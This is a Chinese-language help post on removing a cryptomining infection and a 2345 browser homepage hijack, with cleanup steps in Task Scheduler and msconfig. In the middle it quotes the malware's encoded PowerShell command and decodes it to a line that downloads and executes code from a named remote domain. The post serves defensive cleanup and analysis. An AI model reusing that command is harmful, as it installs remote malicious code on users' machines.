關於挖礦病毒、開機自動下載流氓軟件、瀏覽器主頁被更改為2345等問題的簡單解決辦法
關於下載流氓軟件后瀏覽器默認主頁變成2345或其他流氓主頁的解決辦法
自己的電腦中了挖礦病毒,開機總是會自動執行一些惡意程序,導致CPU被霸占,電腦運行速度變慢,同時C盤中還會不定期的出現一些惡意軟件。由於一時疏忽在網上下載了垃圾軟件,后電腦每次開機總會安裝一些流氓軟件到C盤。
如圖:
這是挖礦病毒在C盤自動安裝並執行的程序。
解決方法:
解決此類問題有一個通用的辦法就是打開你的任務計划程序,方法很簡單,在搜索欄中直接搜索。如圖:
打開后可看到:
你系統中會定時執行的程序都在這里。而一些惡意軟件就是在這里植入了自己的“惡行”,導致系統自動執行一些惡意程序,或者自動下載軟件。如挖礦病毒的惡意計划程序:
而本人電腦上被安裝的也是一個類似的依托360安全瀏覽器自動下載流氓軟件的任務計划程序。
直接將其禁用,並刪除,即可解決以上問題!!同時也要將自動下載的惡意程序、軟件和帶來這些惡果的流氓軟件一並卸載刪除!!
那么,這些惡意程序是如何工作的呢?
我在挖礦病毒自動執行的程序中看到了它自動運行的代碼如下:
powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAY
wBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQA
cAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA
也就是在powershell中自動運行后面的代碼段,我用base64對其進行解密,以下是解密的代碼python:
C:\Users\pc>python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> url = "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA"
>>> str_url = base64.b64decode(url)
>>> print(str_url)
b"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url = base64.b64decode(url).decode("utf-8")
>>> str(str_url)
"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url.replace('\x00','')
"IEX ((new-object net.webclient).downloadstring('http://cs.sslsngyl90.com'))"
替換掉其中的亂碼,可以得到一個網址:http://cs.sslsngyl90.com
打開就發現了其中的“奧秘”
以上就是此類惡意軟件的簡單解決辦法。
瀏覽器默認主頁變成2345的解決方法
對於這個問題,網絡上的解答方法有很多,這里介紹一種一般情況下可以徹底根治且不需要下載殺毒軟件的方法。
1、首先不用多說,先將你下載的流氓軟件和2345瀏覽器一並卸載。一般卸載完畢后打開瀏覽器主頁還是2345不會改變(不然怎么叫流氓呢)
2、然后按win+R,輸入msconfig,打開“啟動”選項,在點擊“打開任務管理器”,此時可以看到一個進程“winhost.exe”如圖,可以先將其禁用:
3、右鍵選擇打開文件所在位置,便可看到這個exe文件,一般它會位於C:\Users\pc\AppData\Local\FLYSVR這個位置,同時一般你還可以在C:\Users\pc\AppData\Local這個位置找到2345Explorer文件夾。(C:\Users\pc\AppData\Local這個路徑可能無法直接找到,可以在搜索欄直接前往,同時,很多困擾你電腦的流氓軟件都可以在這里清理)
4、接下來將2345Explorer和winhost.exe所在的FLYSVR文件夾一並強制刪除即可(如果無法刪除FLYSVR或者winhost.exe文件,可以在任務管理器的進程中找到winhost.exe這個進程,將其結束,然后再刪除即可)。
5、完成上述步驟后,還需要進入瀏覽器的設置界面,將默認主頁設置成你需要的主頁如百度等,這里以Firefox瀏覽器和IE瀏覽器為例,如圖:
6、接下來重啟電腦即可。(可能你會發現winhost.exe仍然在啟動進程里,但其實已經失效)
一般經過上述步驟,就可以解決瀏覽器默認主頁變成2345的問題。關於如何解決流氓軟件、挖礦病毒的問題可以關注我的上一個帖子。
祝大家遠離流氓軟件。